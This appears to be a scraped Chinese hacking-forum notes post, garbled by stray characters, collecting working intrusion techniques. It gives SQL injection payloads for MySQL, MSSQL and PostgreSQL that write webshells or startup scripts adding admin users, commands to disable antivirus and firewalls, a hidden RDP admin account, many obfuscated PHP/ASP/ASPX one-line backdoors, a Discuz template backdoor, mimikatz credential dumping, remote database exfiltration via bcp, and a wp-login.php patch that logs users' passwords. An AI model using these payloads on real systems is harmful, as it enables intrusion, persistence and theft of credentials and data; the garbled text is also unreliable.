create table a (cmd text);
3 h' y7 a1 C1 \. P0 Kinsert into a values ("set wshshell=createobject (""wscript.shell"") " );, ~: Q& R% N" i4 a+ W+ L
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );* o9 B5 T J1 O1 n' `7 v- E
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );8 b2 i9 @! h2 C' f: h
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";7 i- U: e0 _6 \8 t5 y& x
drop table a;
+ |2 l8 X* R6 E# a$ z7 V
! _$ Q. ?2 V; o0 t1 K英文版本:
/ o7 M; K! j5 a8 I7 T4 ?9 ]3 o
- k- ?( ~' Q' n; c2 o# a' ]use test; D+ E! H+ f; j3 r: d
create table a (cmd text);/ n/ I% z/ [5 @
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
$ h: o; t4 d Iinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );( ~ U8 X1 x, F
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );6 D- d% E* a @5 X9 B- y v* \
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
( p) {6 w# u! Udrop table a;
! h# j( ?3 x; M2 q
5 i" z' U4 e# M5 u5 s) ccreate table a (cmd BLOB);; {+ @5 o% E$ s& \" H" u
insert into a values (CONVERT(木马的16进制代码,CHAR));' a* U6 M7 |, B0 k0 H
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
% G! v* b: G% c, [% |0 idrop table a;' B# [- `- n5 M3 j
0 ]9 z$ ~6 C2 W% E8 c) ~6 E记录一下怎么处理变态诺顿 p9 R/ [; o9 z* y2 [( @
查看诺顿服务的路径
; \' u8 d. W" V6 f7 c' L# a3 `sc qc ccSetMgr
4 K" x, H& Y, W9 O" V6 T1 S) e然后设置权限拒绝访问。做绝一点。。
5 m( r6 Z3 B1 E, y9 _9 L+ p) Hcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
% T4 N( e- b5 \: Z' A; [cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
: L8 ~5 y& A1 ?cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators) E% M( x# j, @3 Y& B' \# Y
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone( Y& o+ h1 B, v2 a5 {1 U2 X4 h
% U- z( Y1 P8 l, `" v4 T
然后再重启服务器
* \& y$ H! _) P: J% jiisreset /reboot
* N/ ~! x. B; @$ }2 S2 d这样就搞定了。。不过完事后。记得恢复权限。。。。
& z6 t: A6 M% P- C7 d% Ucacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
6 `& L# x# ~0 s6 S% Dcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
( C3 x8 o' _' ^ `8 H0 |8 y) C4 Kcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F' u4 e! P) [9 g* ~( m1 J
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F' B0 R: v5 ?& L5 ?( y
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
# k" i s- }" y9 |2 b" v+ @9 m
, o z) K0 ~7 J/ KEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')3 S1 I% d9 d3 f/ z' H# x
# D( T: D6 B; e$ n% b
postgresql注射的一些东西
O: J/ Q* R: e C$ `/ u( ]* T如何获得webshell
7 o4 D& T6 A1 `1 I8 B/ ?1 Nhttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); # f8 l$ ]1 _3 J6 C$ } v+ ]# }$ X. ^
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
, I$ Y7 M5 B8 h" y4 K$ ?/ ~http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
; t3 Q& Q$ O. c: z( M如何读文件
3 W+ i; h% h7 d1 N8 nhttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
6 }5 X8 g, ?, F8 ` D3 ?http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;- L4 q0 e; I1 ~% O# M, p7 |1 p
http://127.0.0.1/postgresql.php?id=1;select * from myfile;. Y8 `& o3 F3 A& ]0 z! C2 Z
, Q# [3 M( F2 `4 g* }. J: wz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。! Q: K+ b% A' y5 z
当然,这些的postgresql的数据库版本必须大于8.X
5 y0 I3 d/ h: I7 T- T c. I0 {4 V2 o创建一个system的函数:
. |) E# g" v& ~6 I: K9 p, NCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT# H2 {. U8 V+ T% a- i2 E
7 y5 p$ x0 x0 ~( o' I4 c
创建一个输出表:
6 m& o% e0 b7 o3 t- NCREATE TABLE stdout(id serial, system_out text)
" w# u, D; o1 t& W" A
9 W2 ^. h9 A+ g, X+ o执行shell,输出到输出表内:
( c- W: V, a1 Z, _6 X! sSELECT system('uname -a > /tmp/test')
- o% j& i! t% b3 j2 Q: N) L9 \& X! y3 i9 b3 s+ R' I
copy 输出的内容到表里面;; w c3 o, p: g
COPY stdout(system_out) FROM '/tmp/test'* w+ I" l- q/ u# @0 j/ [3 s
2 ^# G6 }3 f8 N$ s1 M# C2 v _从输出表内读取执行后的回显,判断是否执行成功6 B8 L9 t$ g9 W3 }3 a
$ O% V' K5 Q) Q
SELECT system_out FROM stdout6 [* s9 o# j7 N( X- R, |
下面是测试例子! {$ o% f+ p, a5 G' K
! J( K7 e: E+ Z( i0 h/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
9 S4 a0 `, O. k8 ~: e
- o% _% n. M) P6 v7 I/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'& r/ F: R0 L8 K8 V; e! E
STRICT --3 Y2 z! L2 B& r: R! V0 Q4 V' @, F
5 g: d$ Y$ k0 t- p' ~, c/store.php?id=1; SELECT system('uname -a > /tmp/test') --
4 N1 B6 a. ?/ s6 m
$ _1 |/ z. E/ l$ x# P" N/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --) R8 o: W5 b |7 F
) W; A6 ^0 ^" y H! T2 g/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
/ [# P& b0 f6 a; \net stop sharedaccess stop the default firewall, j( ]3 `1 y! k5 C, k
netsh firewall show show/config default firewall
4 [. W W( W" z% q5 _netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
% h$ }* y5 C6 M0 Z3 Knetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
F$ x4 L$ X) {, ?) v. t2 @& o3 S修改3389端口方法(修改后不易被扫出)
% D) h6 m' @ y# [2 \: u修改服务器端的端口设置,注册表有2个地方需要修改
; f b |+ p7 G
' V! C0 [3 w6 a1 k1 y. z C[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
6 f. h! v% G5 kPortNumber值,默认是3389,修改成所希望的端口,比如6000
' Q0 E5 E/ W7 v0 ^2 \# j, p1 I: D! N: C, s+ i* H( j
第二个地方:7 K0 _3 b ~- M3 a. u" ]$ B3 B
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
0 n; L0 x+ \+ N, H3 h5 PPortNumber值,默认是3389,修改成所希望的端口,比如6000( T! c7 d7 i6 ], ^
" d J% e/ g6 X& L1 o: h
现在这样就可以了。重启系统就可以了/ b6 V" {0 j2 p3 u5 A
$ ]* h; m* P. B& q4 j( g! b1 p
查看3389远程登录的脚本
! ^0 I5 K5 g8 a6 Y3 s, D保存为一个bat文件, N8 \" S. Q5 ]. e! q% Q. }
date /t >>D:\sec\TSlog\ts.log
: h* ~3 T1 J1 O! Ntime /t >>D:\sec\TSlog\ts.log7 g8 ~+ |. G" n+ L8 D( a7 f; ^( Q6 E
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
5 m$ Z6 z( y j; T: {start Explorer
) s" I) w3 G3 H( Q% ?
0 c* t. {6 O9 R$ Q4 f- D/ ]mstsc的参数:! S% I! @ H. I
" B' G7 n- |/ u9 r! T% g" q5 [0 f6 n$ {远程桌面连接
7 V. n1 N3 }$ ]3 M# T" l
3 |6 Y" A& ~* D+ l0 N3 mMSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]( Q7 Z0 \, f+ E. [
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?6 ^0 L, x% a* a0 R3 x
1 C# y3 R z/ c. v! R3 O9 J" d) h<Connection File> -- 指定连接的 .rdp 文件的名称。1 ] @4 M- ~" H0 r
3 `$ K0 e: z: C U- W" l/ s0 p
/v:<server[:port]> -- 指定要连接到的终端服务器。
$ g+ ?) X6 R2 }" ]( Y4 S
0 P7 q8 b+ L# {. b2 V( m" b/console -- 连接到服务器的控制台会话。$ Y2 z/ q! ~ g: g
1 b0 W3 p! |9 [: X& e
/f -- 以全屏模式启动客户端。5 N2 t1 s4 I7 b0 Q! K+ r
+ s* g7 | Y- ~: {; o) {. x/w:<width> -- 指定远程桌面屏幕的宽度。) ^8 Z0 I; S9 p m4 f0 _
; v* s2 H5 d3 ~+ v% p
/h:<height> -- 指定远程桌面屏幕的高度。
) U- h1 J2 F, m: Y& ~) I* a2 y
" q% v% q, ~- Q4 q/edit -- 打开指定的 .rdp 文件来编辑。) k4 \+ T' X9 C+ [5 |
# M! R4 G W- j+ B0 d! K/ B0 B& z
/migrate -- 将客户端连接管理器创建的旧版9 s. y7 n! |3 |! h3 z( ~
连接文件迁移到新的 .rdp 连接文件。
1 @# m9 ?0 I6 ~6 n$ i, n
: {2 ?& |& l9 t+ D
" U2 b* h6 o1 d5 t k p其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
3 M' |% D+ W: M% \mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
4 k3 D8 `8 x5 V0 ?$ ?+ b1 p+ d8 p& \, \( v% B
命令行下开启3389' ]- C5 O0 ]: f% b m* V
net user asp.net aspnet /add! f. p0 x+ ~; Y" d2 l
net localgroup Administrators asp.net /add' ?+ G: `5 l( L) I+ h0 r
net localgroup "Remote Desktop Users" asp.net /add
0 E5 u; W1 F* Y0 T) b6 sattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D1 a+ C& P+ Y; s# Z" z
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
* B% V6 B, k) H4 W, j Z* K4 [echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
. {' p; r% O0 S, [echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f# s! ]4 ~ _$ j! i; L$ K3 h
sc config rasman start= auto/ X/ c- |8 w2 O1 R$ n0 q3 ?
sc config remoteaccess start= auto! O2 `( ]& J& h: H& L* N
net start rasman
- G/ `. h1 `* g0 Z4 Pnet start remoteaccess
1 ]) ~0 u& K" Q5 B! [+ T' x1 I8 @Media8 v* ~; ?( ~ h% p
<form id="frmUpload" enctype="multipart/form-data"
7 U7 _* n+ c7 W% c+ z2 W3 K( }action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
( E" c7 w3 V$ i5 W* m" \; X<input type="file" name="NewFile" size="50"><br>% Z- ?% `3 Z& r$ ^( N
<input id="btnUpload" type="submit" value="Upload">' M- x! X8 `; m" |. g
</form>: X: k% L. z( X* G8 H' N& R
; {# H- l7 s0 a4 I# jcontrol userpasswords2 查看用户的密码
0 m1 j J7 j% }, \3 ~access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
& z. B& c4 l7 a1 S5 v# a% n- Q0 _SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
8 a% ]+ V3 Y! I+ C6 `$ G9 J7 g1 ~
/ ?7 h- F, |4 U4 p3 L' d141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
- R, L( A- T2 H2 I, R) q测试1:
/ e* M! u- q- N" S kSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1- l9 g4 ?* [8 M
$ H `4 L% P3 {, X! G; c6 b3 g测试2:# {+ y6 e o) u6 v; V
1 h. D% }6 I2 j* ~
create table dirs(paths varchar(100),paths1 varchar(100), id int)
7 v- c3 Q& R( i4 S |
0 W7 h5 s% P& a* t& {4 Bdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
2 R' F( R0 {. K+ O* N6 Y9 Y k4 y8 @& m; z8 u, |7 s( _
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
Z' a; l& W0 k5 @# v: S$ s A4 h- T! @关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令* u H( A# [# B# u: d% F- H" M
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;! w5 L* }7 t9 A
net stop mcafeeframework
7 D% G- K. {0 m q8 | e) \net stop mcshield* b o! S6 Q" C( |' o L; H
net stop mcafeeengineservice
6 H7 l; J5 m: S( O, o' \- Wnet stop mctaskmanager6 X. |. b* w) e Z
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
" H4 D; j4 y; N+ U3 H5 f$ [& w
% \# L' N R' z P- k VNCDump.zip (4.76 KB, 下载次数: 1)
% u1 D, {4 l5 ]: T' L4 l6 {6 a0 Q密码在线破解http://tools88.com/safe/vnc.php
# s/ \3 z$ x" A- `! S! U+ {VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
* X6 O5 q6 `8 q V3 W) J9 w/ o$ a+ w( x& U B8 E+ x
exec master..xp_cmdshell 'net user'8 ~& G& v* h4 S! e( U2 W7 e! O
mssql执行命令。3 u+ C. x3 k! m' G+ G# C, X
获取mssql的密码hash查询
! E& O. y: x! ?- S$ A% x1 eselect name,password from master.dbo.sysxlogins2 l! C9 Z6 V' M0 w' p0 _6 q
3 U1 U, _ w8 T; K6 q f+ wbackup log dbName with NO_LOG;4 l# l; w/ L! i1 R P& z. i! S5 I5 q: J
backup log dbName with TRUNCATE_ONLY;4 X6 n# t$ u* J% g
DBCC SHRINKDATABASE(dbName);
! X4 c5 ? s1 b* d3 pmssql数据库压缩
0 V6 L; t: f& \' Y2 C- L
' o" X5 f0 ~1 i- TRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK2 l/ O6 ~. E( [6 r& c
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
+ c: _2 J# J! m; o( Q$ r8 k; a) s4 b$ Q# z8 N# K
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
+ G, W5 s9 X0 H% r3 u: B. j备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
- |: F: C3 s2 ^9 T" o; d: v9 {7 q6 X6 l) H% P$ a u
Discuz!nt35渗透要点:
' Q. p+ q( T! [(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default+ h( ?: N( S! Y+ k* s+ X1 O
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
3 ~1 V d5 K5 m6 ]( g! ^' A(3)保存。
9 d g9 h9 y( D; b( w(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
% M1 O9 @) d( n( Qd:\rar.exe a -r d:\1.rar d:\website\ c/ T4 [% }# K
递归压缩website5 {2 v4 r l* E5 c/ ?5 `* G
注意rar.exe的路径# f+ V2 [# C9 ^6 I
2 ?$ k( B3 [% _* @0 z. M0 h<?php
! ~7 G( i& f$ h j& D1 ^6 c6 | }7 F2 H, Y
$telok = "0${@eval($_POST[xxoo])}";
" ]4 W. G1 g% h# Y. U8 c% T) {3 v! `% B2 g% \0 H' I- W: f8 D
$username = "123456";% X) C# e7 h: H% Z, l
: z1 T* }- m- S* [7 M5 x' I
$userpwd = "123456";. {* y" x0 a3 X4 ]; H) r) t8 B8 a
, j9 W: Y! T- G, {9 U" j$ |3 [$telhao = "123456";
/ }( |6 u4 z' u; ^* n
' i1 J. q" N, d4 F# C9 K3 @2 z4 z$telinfo = "123456";. n N" E- S3 _" S
6 p& h/ F# N* v; [
?>1 s9 P: [8 s/ V# F `& M7 D
php一句话未过滤插入一句话木马* {3 c5 q7 _* M
5 r' T% u a8 v1 d9 B* [: F- S
站库分离脱裤技巧
. r( z$ o% [( p2 W* P* l; Nexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'9 x' _7 A! O5 Y
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'9 K4 z/ {+ }' ^6 \9 [7 G J
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
5 O9 k. I; k* w这儿利用的是马儿的专家模式(自己写代码)。, B0 H0 D( G2 A& c; T% ^ Y; V
ini_set('display_errors', 1);
2 h9 w/ [4 X: P7 z' Z# z& K+ S! T7 O# Yset_time_limit(0);. D, ?; H& r2 f5 K C5 F/ X
error_reporting(E_ALL);) p. g( k9 ^) q' g9 I) `' n5 Q/ r
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
1 I" R* u# r+ z7 L/ |+ @mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
7 L. w% R8 {9 v- L2 [$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
1 \7 C3 p2 M. b* s$ U0 O$i = 0;
, `3 _& Y; ~( F {6 P- l$tmp = '';8 q9 [( t: I' ?2 C+ G# y
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {6 a9 t. H' i, p# n, i) w3 c
$i = $i+1;
: Q" a* r& Y: ?6 R' t; g5 P $tmp .= implode("::", $row)."\n";
/ h) f- f/ [) i if(!($i%500)){//500条写入一个文件
* S3 p! Z: z' q# I, ]+ x $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';3 }4 z) e2 R9 }7 @; r
file_put_contents($filename,$tmp);
% `& F A" S6 w3 u+ N' r $tmp = '';. ]3 O3 R4 K! h" z
}
% |; k( G' n; i}
5 Y2 x) Z& K: Y3 W" M4 ymysql_free_result($result);& k7 V( O& {2 R* w
' f/ D+ v& b8 m% Q+ ?- m2 ^: f/ y6 T, q+ A. }5 i
5 w$ ]0 i; d% `. L* H% e8 Y. A//down完后delete' @! B; U$ W# {# i7 s" h
5 c% Q: a. n. |' {; K& L7 Z
& s T% u+ J* F3 e+ w6 u! k# P8 g/ Cini_set('display_errors', 1);
1 S3 ?( ^, |! h* W$ t/ Z8 Uerror_reporting(E_ALL);
9 S- k& e9 ?- v! K$i = 0;
) { [1 `6 w1 u1 Mwhile($i<32) {
# m) y! P% c& C7 P- s $i = $i+1;% G$ J" j; z* c9 i
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
& q* W# T6 z. U; t4 z; ^! ?, P unlink($filename);
- e0 x# b W5 b- U1 y} $ L6 U& Q3 z; y2 Q+ @1 P E) @
httprint 收集操作系统指纹
6 n6 Z3 R* O/ H2 ?. J7 x& O扫描192.168.1.100的所有端口2 `1 O2 b/ s# O5 d0 c. S0 w
nmap –PN –sT –sV –p0-65535 192.168.1.100% g2 a! `/ ]6 w @
host -t ns www.owasp.org 识别的名称服务器,获取dns信息
' p! e8 Y7 D- e. Xhost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
4 j6 E& d2 R( Y+ [" _& B& bNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host* E& p6 w O( `- y; x
3 z: i: J4 k# L. PDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
8 v. t- F% F' O) R& P! d4 P7 \
8 ]2 X+ [/ |7 I MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)4 p5 @+ y( @8 R: u3 u. y1 g
: g( {% L: a0 x2 c# {! v' c4 ^ Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x! Q+ r/ V( q1 S7 N' C
. Z) f+ U# k1 g8 m# k1 K DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)0 X( D2 t2 f2 ^, p6 e% j! v) g
- W4 f. s* U+ ~ g" i; Q http://net-square.com/msnpawn/index.shtml (要求安装)0 N1 |" c7 A% o( d4 l
1 a) _2 t/ s [
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
, d7 e! U: \" w. V7 K ^! ]% [, E4 N) p3 J) X
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
3 i- u1 A! U9 y+ I |set names gb2312
" L5 e8 R& h3 m/ X( c9 y) K导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
& [6 O, [4 N1 t5 K1 C2 |
4 _' S" x! t/ Ymysql 密码修改
/ G8 U, X; A3 a9 a z( IUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” & b. S# z- v8 o3 l& y5 m
update user set password=PASSWORD('antian365.com') where user='root';% J/ T. \7 o1 g& K5 y
flush privileges;; G( y/ V b$ ^* m- x, L
高级的PHP一句话木马后门1 j; }' n2 m/ ?% G |: B8 _
# w" u/ ?3 N$ Q# ?# y0 l
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
1 Z2 G5 h" H9 N6 L L% b. y! D6 G! r, w9 {9 ]9 [/ l7 @
1、
F, C! ~6 V6 W: x8 f; d
5 d* ]2 L6 g1 w, K$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
; u4 R, I, E# N5 s; q
4 _% s) w E3 j$hh("/[discuz]/e",$_POST['h'],"Access");
# q- N7 {, l3 i5 A
5 \, V9 I3 Y! O//菜刀一句话+ C/ x5 D- C5 q0 G: q k
8 a0 Q6 Z5 {$ i/ \ a2 C0 u2、) T# {2 W! V+ O2 |& Q
$ ?9 N: R5 v/ O/ v4 o$filename=$_GET['xbid'];
- {) |; @9 a6 G7 [1 ^4 w8 q3 t% }$ k4 n' F5 j
include ($filename);
) \' b) L. v) c4 X4 H7 X) _
J* D! F, w1 I1 N& {//危险的include函数,直接编译任何文件为php格式运行
- l, J5 `( x2 Z0 i
0 K* E! N0 L% Y4 O3、, m6 z0 {4 E& R; F, R% D
7 e; S' @" ]$ P$ U
$reg="c"."o"."p"."y";
0 p! X( Z- Y- {% E" a/ `! F! v# O
" O7 n8 n# K5 c& ?7 l$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]); i+ Y; k/ ^& I/ @ ]* p6 d7 D; R
+ c; B8 _- I% {5 }1 T: y) g, ]
//重命名任何文件
* ^; W8 H; c: t2 ?7 M; K s8 X7 k' K) j
4、
1 g; N$ ` h( A7 C: o1 O' h0 A6 o5 S$ m
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";% _' K, K( }4 R, Y- r1 g# q5 b# Q6 T
) P3 k2 R3 Y3 i- {! C# \
$gzid("/[discuz]/e",$_POST['h'],"Access");' J: U w( [/ T+ }6 i- A5 R
% r; G& E1 `7 f( k
//菜刀一句话 |+ e5 G8 Z( F) q0 L( |
1 v) d3 Z, Q6 ?9 b; n5、include ($uid);
: n4 @+ |; o8 m/ m5 t* @; ~7 B- [0 I7 u: |- y1 t+ d
//危险的include函数,直接编译任何文件为php格式运行,POST
% _! r& E+ A `3 [/ X8 q) c7 L& X' ]; y I9 G0 g8 v
' h: g* P! T% T. t' M. c. L1 R//gif插一句话
6 F# w9 H0 W* T3 |
- W4 l8 Z0 u2 G/ d f' Y6、典型一句话
! N& U4 V3 U8 N+ j9 H! q3 J- n
" z- X* z7 {: r" g0 F程序后门代码, j; n* Y" |* Q7 z- G& g3 f
<?php eval_r($_POST[sb])?>
5 H% d( I8 `* ?. }程序代码& N0 h. q4 _1 o3 t
<?php @eval_r($_POST[sb])?>
# O0 n7 |) w. Z* \) g//容错代码' F: F- _4 u- y7 l
程序代码
' _& t6 u b$ X% P<?php assert($_POST[sb]);?>
8 S; o5 o0 a3 z+ {7 R" _//使用lanker一句话客户端的专家模式执行相关的php语句
! t! g4 E4 c; N2 [9 Q& b3 i程序代码
3 J+ r _2 S2 a# L* H7 X<?$_POST['sa']($_POST['sb']);?>
- \& |/ d/ G( L6 R, A程序代码3 d7 d; x9 a/ d& `. j. _. |0 _
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
( p- k- t& M- L) v/ D' Y程序代码) B x! e4 H' u% y, f7 s" S
<?php9 C7 f/ X3 j& H& K% ^ d
@preg_replace("/[email]/e",$_POST['h'],"error");# {. R- N' A; [4 f# d' p% A
?>
0 _6 b0 y2 S2 |9 c//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入* e) x3 ^* Z; Q7 D& ~
程序代码
7 Y9 @/ U+ u& O( ]+ [; {; G5 G<O>h=@eval_r($_POST[c]);</O>
5 U% B' i( d0 N' {, ?2 k0 n程序代码
! w2 J( q% v0 r' H: E7 N, r9 d) W3 x<script language="php">@eval_r($_POST[sb])</script>
0 `2 O c+ t. q, |/ O# t/ Y//绕过<?限制的一句话- U/ b# W4 N4 S( a2 @" R0 ^
# A/ J2 }* j& `1 P7 a; l* ?http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
( U# f, A1 \2 e1 s7 S" c详细用法:
( {5 S$ V+ G& ]9 h2 v: I/ C1、到tools目录。psexec \\127.0.0.1 cmd0 L; E! P' A) o; J, d% k, ^2 o7 g
2、执行mimikatz! \; ~" P9 e/ D0 R1 S H! b
3、执行 privilege::debug
9 i3 m4 B7 l# X' x8 ]* ?4、执行 inject::process lsass.exe sekurlsa.dll3 O; n7 A$ Q# {3 I. q# D- j5 x
5、执行@getLogonPasswords
* D6 r; h- b8 x8 m1 F- r* v5 h1 e7 Q6、widget就是密码 Q1 q5 V3 p* P- u' q5 U& V5 `
7、exit退出,不要直接关闭否则系统会崩溃。7 g2 a4 `6 Z9 V2 l
# a$ Z; \7 j+ X; i
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面% g$ g- k8 c% {# c0 k) }, K% }
- }) U8 W: K" ~: z2 l5 N
自动查找系统高危补丁
- B" m" f& z: R% V! `5 Lsysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt) X! _; y" \ f6 r# N
; L1 y/ s) [1 o' L. \8 W突破安全狗的一句话aspx后门. o/ g5 U( U N# Q' y! ?
<%@ Page Language="C#" ValidateRequest="false" %>/ T6 V; A! l* v0 \) `; J0 U
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>0 ]$ s7 ]) H T% k+ e4 @, U
webshell下记录WordPress登陆密码
0 r5 H4 |' W+ P/ c& ~webshell下记录Wordpress登陆密码方便进一步社工
* F5 B( X2 h1 N# C在文件wp-login.php中539行处添加:
1 u- P9 s8 ?# s# U// log password
" X2 x+ v4 h. j' d$log_user=$_POST['log'];
/ }3 E N- p, A9 v [0 Y- E$log_pwd=$_POST['pwd'];! v# T( u1 A& x2 U* p
$log_ip=$_SERVER["REMOTE_ADDR"];
% n( \ l& t( L+ z$ O$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
, \. J& W. l. o) B$txt=$txt.”\r\n”;. q' \$ p$ w5 U- J* U
if($log_user&&$log_pwd&&$log_ip){
x4 q* r2 `/ Y w9 b@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
& Y0 P. n9 ~# c4 J% [}7 z) `2 W" m2 ^2 |+ C$ l! m
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
5 k, }* d4 ]6 U+ W/ P1 V: z就是搜索case ‘login’
. Z5 u$ I& H7 \0 ~在它下面直接插入即可,记录的密码生成在pwd.txt中,$ [7 n; W$ z! o5 E5 b* J
